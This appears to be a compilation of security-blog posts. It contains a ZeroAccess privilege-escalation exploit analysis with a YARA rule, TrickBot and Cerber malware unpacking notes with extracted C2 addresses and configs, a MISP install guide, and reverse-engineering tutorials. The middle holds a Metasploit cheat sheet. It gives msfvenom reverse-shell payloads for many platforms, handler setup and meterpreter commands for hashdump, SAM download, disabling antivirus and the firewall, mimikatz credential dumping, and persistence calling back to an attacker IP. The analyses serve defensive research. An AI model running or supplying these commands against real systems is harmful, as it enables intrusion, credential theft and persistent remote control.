ZeroAccess Trojan: CVE-2015-1701 –> Local Privilege Exploit (LPE) Analysis

Picture

Objective:

  • Analyze the ZeroAccess Trojan custom local privilege exploit (LPE) related to CVE-2015-1701.

​CVE-2015-1701:

  • Win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in April 2015, aka “Win32k Elevation of Privilege Vulnerability.”
LPE Implementation and Functionality:

  • Registers a vectored exception handler and sets a hardware breakpoint on a specific function. When this function is then called, the exception handler jumps in and continues the execution.
  • The hardware breakpoint is set on KiUserExceptionDispatcher.
  • Loads UxTheme.dll via LoadLibraryA, detected by Kernel API Logger.
  • Prints MessageBoxA with “Error” and “User32.”
Additional Analysis:

  • File: exploit_1f8c42caeacb44f2a738ee2104457220eca6d7a7416f953d01bc716a63b3db8d
  • Size: 24064 Bytes
  • MD5: B5DADAAF9C8FEDF84542DD69C9776B04


Dumped Process:

  • File: exploit_1f8c42caeacb44f2a738ee2104457220eca6d7a7416f953d01bc716a63b3db8d_dmp.exe_
  • MD5:  2b6f803b5ade6eb0b0b960782640765c
  • Size: 40962 Bytes


PDB Path:

  • d:\ZZZ\release\ui[.]pdb


Api Log:

————————————————–
***** Installing Hooks *****  
71ab74df     RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\WinSock2\Parameters)  
71ab80c4     RegOpenKeyExA (Protocol_Catalog9)  
71ab2623     WaitForSingleObject(794,0)  
71ab87c6     RegOpenKeyExA (NameSpace_Catalog5)  
71ab835b     RegOpenKeyExA (Catalog_Entries)     
71ab2623     WaitForSingleObject(78c,0)  
71aa1af2     RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\Winsock2\Parameters)  
71aa198e     GlobalAlloc()  
7c80b719     ExitThread()  
5ad8bdf9     GetCurrentProcessId()=3644  
5ad7a0e2     IsDebuggerPresent()  
773d3faf     LoadLibraryA(UxTheme.dll)=5ad70000    

773ea4a1     GetCurrentProcessId()=3644  

Yara Signature:

rule crime_win32_zeroaccess_lpe
{
    meta:
        description = “Detects the ZeroAccess trojan local privilege exploit related to CVE-2015-1701”
        author = “Vitali Kremez”
        date = “2016-05-23”
        hash = “b5dadaaf9c8fedf84542dd69c9776b04”

    strings:
        $s0 = “\\KnownDlls\\user32.dll” fullword wide
        $s1 = “\\KnownDlls\\kernel32.dll” fullword wide
        $s2 = “” fullword ascii
        $s3 = “d:\\ZZZ\\release\\ui.pdb” fullword ascii
        $s4 = “%p->VirtualProtect([%p, %p) %08X, %s)” fullword ascii
        $s5 = “%p->VirtualAlloc(%p, %08X)” fullword ascii
        $s6 = “%p SSL_SetURL(%s)=%p” fullword ascii
        $s7 = “@Microsoft Unified Security Protocol Provider” fullword wide
        $s8 = “rrrrtm” fullword ascii
        $s9 = “ddddtt” fullword ascii
        $s10 = “%p %s=%p” fullword ascii

        $op0 = { 3b 58 34 74 0c bf 03 00 00 40 eb 05 bf 01 00 00 }
        $op1 = { c3 e9 3a 05 00 00 48 8d 05 01 }
        $op2 = { 8b 45 fc ff 70 10 68 72 72 72 72 8b 4d fc e8 9c } 
 condition:
        uint16(0) == 0x5A4D and filesize < 70KB and all of ($s*) and 1 of ($op*)
}

Metasploit Cheat Sheet

List payloads

msfvenom -l

I. Binaries


Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho


II. Web Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

III. Scripting Payloads


Python

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl


For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

IV. Shellcode


Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 


Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 


Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 


Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive 

your incoming shells. Handlers should be in the following format.


VI. Handlers

use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z


Meterpreter Useful Commands:



upload file c:\\windows





upload file c:\\windows





download c:\\windows\\repair\\sam /tmp





execute -f c:\\windows\temp\exploit.exe





execute -f cmd -c





ps





shell





getsystem





hashdump





portfwd add –l 3389 –p 3389 –r target





portfwd delete –l 3389 –p 3389 –r target





portfwd delete –l 3389 –p 3389 –r target


Additional useful commands are as follows:

  • msfconsole – r unicorn.rb

  • meterpreter shell

  • getsid

  • getuid

  • migrate

  • getsystem

  • run killav

  • run checkvm

  • exploit Windows7 Service Pack 1 msp

  • use incognito

  • run countermeasure

  • run countermeasure –d –k

  • shell


    • netsh firewall set opmode disable //disable firewall


  • run vnc

  • load mimikatz

  • ls

  • upload /home/user/mimikatz.exe C:\\

  • timestop mimikatz.exe -f "C:\\Windows\System32\\cmd.exe"

  • shell


    • mimikatz.exe

    • privilege::debug

    • inject::process lsass.exe sekurlsa.dll

    • getLogonPasswords

    • sekurlsa::logonPasswords full


  • run persistence -A -L C:\\ -X -i 10 -p 443 -r 192.168.0.196

  • attrib +h c:\autoexec.bat //make it hidden

  • Priv Esc Exploit CVE-2014-4113 (ms14_058_track_popup_menu)


Let’s Learn: Installing MISP Using Docker

Sourcehttps://github.com/harvard-itsecurity/docker-misp
Goal: Install and configure a local instance of Malware Information Sharing Platform and Threat Sharing (MISP)

Steps:
(0) Install Docker (source: https://docs.docker.com/engine/installation/)
(1) Initialize Database

docker run -it --rm \
-v /:/var/lib/mysql \
harvarditsecurity/misp /init-db

(2) Start the Docker Container

docker run -it -d \
-p 443:443 \
-p 80:80 \
-p 3306:3306 \
-v :/var/lib/mysql \
harvarditsecurity/misp

Unpacking TrickBot Banker

Source2c4eab037c37b55780cce28e48d930faa60879045208ae4b64631bb7a2f4cb2a

Steps:
(1) Dump the injected process using Immunity Debugger;
(2) Rebase and obtain a TrickLoader‘s injected executable from memory;
(3) Find host-based and network protocol artifacts;
(4) Decode the config finding by advapi.dll’s CryptDecrypt API

<mcconf>
<ver>1000002</ver>
<gtag>tmt2</gtag>
<servs>
<srv>91.219.28.77:443</srv>
<srv>193.9.28.24:443</srv>
<srv>37.1.209.51:443</srv>
<srv>138.201.44.28:443</srv>
<srv>188.116.23.98:443</srv>
<srv>104.250.138.194:443</srv>
<srv>46.22.211.34:443</srv>
<srv>68.179.234.69:443</srv>
<srv>5.12.28.0:443</srv>
<srv>36.37.176.6:443</srv>
<srv>37.109.52.75:443</srv>
<srv>27.208.131.97:443</srv>
</servs>
<autorun>
<modulename=systeminfo ctl=GetSystemInfo/>
<modulename=injectDll/>
</autorun>
</mcconf>

Cerber Ransomware: Unpacking Malware from Memory and Extracting Its Configuration



I. Steps:
(1) Debug a CERBER ransomware variant in Immunity Debugger or OllyDbg;
(2) Set up “Debugging Option” making a first pause on WinMain (if available) with “Break on New Module (DLL)“;
(3) Obtain an “MZ” header file from memory dump of the suspicious DLL injection;
(4) Carve this file and make sure it has necessary Crypto API characteristic of CERBER;
(5) Run the file in Immunity Debugger or OllyDbg setting up a breakpoint on “GetFileSize” function and stepping into this WinAPI call until you see an ASCII JSON config of CERBER;
(6) Carve the config by following in dump and beautifying its JSON;
(7) Obtain C2 data by breaking “sendto” call;
(8) Obtain network protocol; and
(9) Obtain its local RSA key.


II. CERBER Configuration:


{
    “blacklist”: {
        “extensions”: [“.hta”],
        “files”: [“bootsect.bak”, “iconcache.db”, “ntuser.dat”, “thumbs.db”],
        “folders”: [“:\\$getcurrent\\”, “:\\$recycle.bin\\”, “:\\$windows.~bt\\”, “:\\$windows.~ws\\”, “:\\boot\\”, “:\\documents and settings\\all users\\”, “:\\documents and settings\\default user\\”, “:\\documents and settings\\localservice\\”, “:\\documents and settings\\networkservice\\”, “:\\intel\\”, “:\\msocache\\”, “:\\perflogs\\”, “:\\program files (x86)\\”, “:\\program files\\”, “:\\programdata\\”, “:\\recovery\\”, “:\\recycled\\”, “:\\recycler\\”, “:\\system volume information\\”, “:\\temp\\”, “:\\windows.old\\”, “:\\windows10upgrade\\”, “:\\windows\\”, “:\\winnt\\”, “\\appdata\\local\\”, “\\appdata\\locallow\\”, “\\appdata\\roaming\\”, “\\local settings\\”, “\\public\\music\\sample music\\”, “\\public\\pictures\\sample pictures\\”, “\\public\\videos\\sample videos\\”, “\\tor browser\\”],
        “languages”: [1049, 1058, 1059, 1064, 1067, 1068, 1079, 1087, 1088, 1090, 1091, 1092, 2072, 2073, 2092, 2115]
    },
    “check”: {
        “language”: 1
    },
    “close_process”: {
        “close_process”: 1,
        “process”: [“agntsvc.exeagntsvc.exe”, “agntsvc.exeencsvc.exe”, “agntsvc.exeisqlplussvc.exe”, “dbeng50.exe”, “dbsnmp.exe”, “fbserver.exe”, “firefoxconfig.exe”, “msftesql.exe”, “mydesktopqos.exe”, “mydesktopservice.exe”, “mysqld-nt.exe”, “mysqld-opt.exe”, “mysqld.exe”, “ocautoupds.exe”, “ocomm.exe”, “ocssd.exe”, “oracle.exe”, “sqbcoreservice.exe”, “sqlagent.exe”, “sqlbrowser.exe”, “sqlservr.exe”, “sqlwriter.exe”, “synctime.exe”, “tbirdconfig.exe”, “xfssvccon.exe”]
    },
    “debug”: 0,
    “default”: {
        “site_1”: “onion.to”,
        “site_2”: “onion.cab”,
        “site_3”: “onion.nu”,
        “site_4”: “onion.link”,
        “site_5”: “tor2web.org”,
        “tor”: “zutzt67dcxr6mxcn”
    },
    “encrypt”: {
        “bytes_skip”: 512,
        “divider”: 262144,
        “encrypt”: 1,
        “files”: [

p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica}

                [“.123”, “.1cd”, “.3dm”, “.3ds”, “.3fr”, “.3g2”, “.3gp”, “.3pr”, “.602”, “.7z”, “.7zip”, “.aac”, “.ab4”, “.abd”, “.acc”, “.accdb”, “.accde”, “.accdr”, “.accdt”, “.ach”, “.acr”, “.act”, “.adb”, “.adp”, “.ads”, “.aes”, “.agdl”, “.ai”, “.aiff”, “.ait”, “.al”, “.aoi”, “.apj”, “.apk”, “.arc”, “.arw”, “.ascx”, “.asf”, “.asm”, “.asp”, “.aspx”, “.asset”, “.asx”, “.atb”, “.avi”, “.awg”, “.back”, “.backup”, “.backupdb”, “.bak”, “.bank”, “.bat”, “.bay”, “.bdb”, “.bgt”, “.bik”, “.bin”, “.bkp”, “.blend”, “.bmp”, “.bpw”, “.brd”, “.bsa”, “.bz2”, “.c”, “.cash”, “.cdb”, “.cdf”, “.cdr”, “.cdr3”, “.cdr4”, “.cdr5”, “.cdr6”, “.cdrw”, “.cdx”, “.ce1”, “.ce2”, “.cer”, “.cfg”, “.cfn”, “.cgm”, “.cib”, “.class”, “.cls”, “.cmd”, “.cmt”, “.config”, “.contact”, “.cpi”, “.cpp”, “.cr2”, “.craw”, “.crt”, “.crw”, “.cry”, “.cs”, “.csh”, “.csl”, “.csr”, “.css”, “.csv”, “.d3dbsp”, “.dac”, “.das”, “.dat”, “.db”, “.db3”, “.db_journal”, “.dbf”, “.dbx”, “.dc2”, “.dch”, “.dcr”, “.dcs”, “.ddd”, “.ddoc”, “.ddrw”, “.dds”, “.def”, “.der”, “.des”, “.design”, “.dgc”, “.dgn”, “.dif”, “.dip”, “.dit”, “.djv”, “.djvu”, “.dng”, “.doc”, “.docb”, “.docm”, “.docx”, “.dot”, “.dotm”, “.dotx”, “.drf”, “.drw”, “.dtd”, “.dwg”, “.dxb”, “.dxf”, “.dxg”, “.edb”, “.eml”, “.eps”, “.erbsql”, “.erf”, “.exf”, “.fdb”, “.ffd”, “.fff”, “.fh”, “.fhd”, “.fla”, “.flac”, “.flb”, “.flf”, “.flv”, “.forge”, “.fpx”, “.frm”, “.fxg”, “.gbr”, “.gho”, “.gif”, “.gpg”, “.gray”, “.grey”, “.groups”, “.gry”, “.gz”, “.h”, “.hbk”, “.hdd”, “.hpp”, “.html”, “.hwp”, “.ibank”, “.ibd”, “.ibz”, “.idx”, “.iif”, “.iiq”, “.incpas”, “.indd”, “.info”, “.info_”, “.iwi”, “.jar”, “.java”, “.jnt”, “.jpe”, “.jpeg”, “.jpg”, “.js”, “.json”, “.k2p”, “.kc2”, “.kdbx”, “.kdc”, “.key”, “.kpdx”, “.kwm”, “.laccdb”, “.lay”, “.lay6”, “.lbf”, “.lck”, “.ldf”, “.lit”, “.litemod”, “.litesql”, “.lock”, “.ltx”, “.lua”, “.m”, “.m2ts”, “.m3u”, “.m4a”, “.m4p”, “.m4u”, “.m4v”, “.ma”, “.mab”, “.mapimail”, “.max”, “.mbx”, “.md”, “.mdb”, “.mdc”, “.mdf”, “.mef”, “.mfw”, “.mid”, “.mkv”, “.mlb”, “.mml”, “.mmw”, “.mny”, “.money”, “.moneywell”, “.mos”, “.mov”, “.mp3”, “.mp4”, “.mpeg”, “.mpg”, “.mrw”, “.ms11”, “.msf”, “.msg”, “.mts”, “.myd”, “.myi”, “.nd”, “.ndd”, “.ndf”, “.nef”, “.nk2”, “.nop”, “.nrw”, “.ns2”, “.ns3”, “.ns4”, “.nsd”, “.nsf”, “.nsg”, “.nsh”, “.nvram”, “.nwb”, “.nx2”, “.nxl”, “.nyf”, “.oab”, “.obj”, “.odb”, “.odc”, “.odf”, “.odg”, “.odm”, “.odp”, “.ods”, “.odt”, “.ogg”, “.oil”, “.omg”, “.one”, “.onenotec2”, “.orf”, “.ost”, “.otg”, “.oth”, “.otp”, “.ots”, “.ott”, “.p12”, “.p7”]
}

III. C2 Traffic:
  • 1.11.32.9.0-31
  • 55.15.15.0-31
  • 194.165.16.0-254
  • 194.165.17.0-254

IV. Protocol Communication:


  • “{MD5_KEY}{PARTNER_ID}{OS}{IS_X64}{IS_ADMIN}{COUNT_FILES}{STOP_REASON}{STATUS}”


VI. RSA Key

VII. CERBER Debug Strings:


Reverse Engineering: Analyzing Compiled OOP in Binaries

Source: opensecuritytraining.info

In C++, the this Pointer is a reference to the object that Methods act upon. This calling convention is commonly known as Thiscall. Understanding how to recognize the this pointer when reverse engineering object oriented code will is can aid in tracking objects and understanding the relationships between objects and their methods.

By convention, Microsoft Visual C++ compilers pass the this pointer to instance methods through the ECX register, and passes the rest of the parameters onto the stack in reverse order (like Stdcall).

The GCC compiler Thiscall is based on Cdecl; however, it pushes this onto the stack before the method call after all arguments have been pushed.

Some compilers, such as Borland and Watcom, reportedly store this in EAX. As always, these are conventions, and though exceptions to the rules exist, they are fairly reliable.


When a Class or Struct instance is created, a block of contiguous memory is created to store it’s object’s member variables. A pointer, commonly referred to as this, points to the base address of the structure.

Member access typically occurs as a two instruction sequence

  • The this pointer is stored in a register (e.g. ECX, ESI)
    1. The member is retrieved as an offset and stored

    mov ecx, [ebp + var_myobj]   ; Store the object pointer
    mov eax, [ecx + 0Ch] ; Store the member 12 bytes from object base
    Access to these offsets within an object’s memory space can to give leads to its composition (and ultimately the Class/Struct definition). Note that often times some of the data that comprises an object may be other objects (perhaps of different classes) which are embedded. An object may also contain pointers to objects, arrays, function tables, or other data.


    The life of a Class/Struct instance begins with a Constructor and ends with a Destructor. Both of the special methods are optional; however, behind the scenes, there is generally some sort of initialization (perhaps with exceptions such as a global Struct instance).

    Constructor

    Destructor

    When developing Classes in C++, inheritance is used to define characteristics and functionality only once for functionality shared by several related classes. For example, the following could be base class for people:

    class Person {
    protected:
    char name[50];
    public:
    Person(char *_name) { strncpy(name, _name, 50); }
    virtual void work() {
    printf("%s moves some boxes\n", name);
    }
    };

    Here the Person class is defined with a single function which can be overridden any derived classes:

    class Novelist : public Person {
    public:
    Novelist(char *_name) : Person(_name) {}
    virtual void work() {
    printf("%s writes a book\n", name);
    }
    };

    A Novelist can be created using a Person pointer:

    Person *Chaucer = new Novelist((char*)"Geoffrey Chaucer");
    Chaucer->work(); // Will write "Geoffrey Chaucer writes a book\n" to STDOUT

    The initialization code for looks very similar to code for classes not using inheritance:



    Reverse Engineering: Structs and Nodes in Bomb6.exe

    Sourceopensecuritytraining.info


    • Coloring can help to clarify
      • Be consistent in your coloring methodology
    • Collapse and Analyze algorithm:
      1. Find bold line (that’s the loop)
      2. Start at bold line’s arrow head and follow it backwards
        • If encounter another bold line’s arrow head, collapse that inner loop first
      3. Collapse loop
      4. After all loops have been collapsed, analyze starting at the beginning of the function
        • Pseudo-code it
        • Re-collapse
        • Next
    • Use script (e.g. IDC) to define large structures
    auto struct_id, member_id;
    struct_id = AddStrucEx(
    1, //index
    'MyStruct', //name
    0 // is_union
    );
    member_id = AddStrucMember(
    struct_id, // long id
    'my_member', // string name
    0x220, // long offset
    FF_DWRD, // long flag
    -1, // long typeid
    4 // long nbytes
    );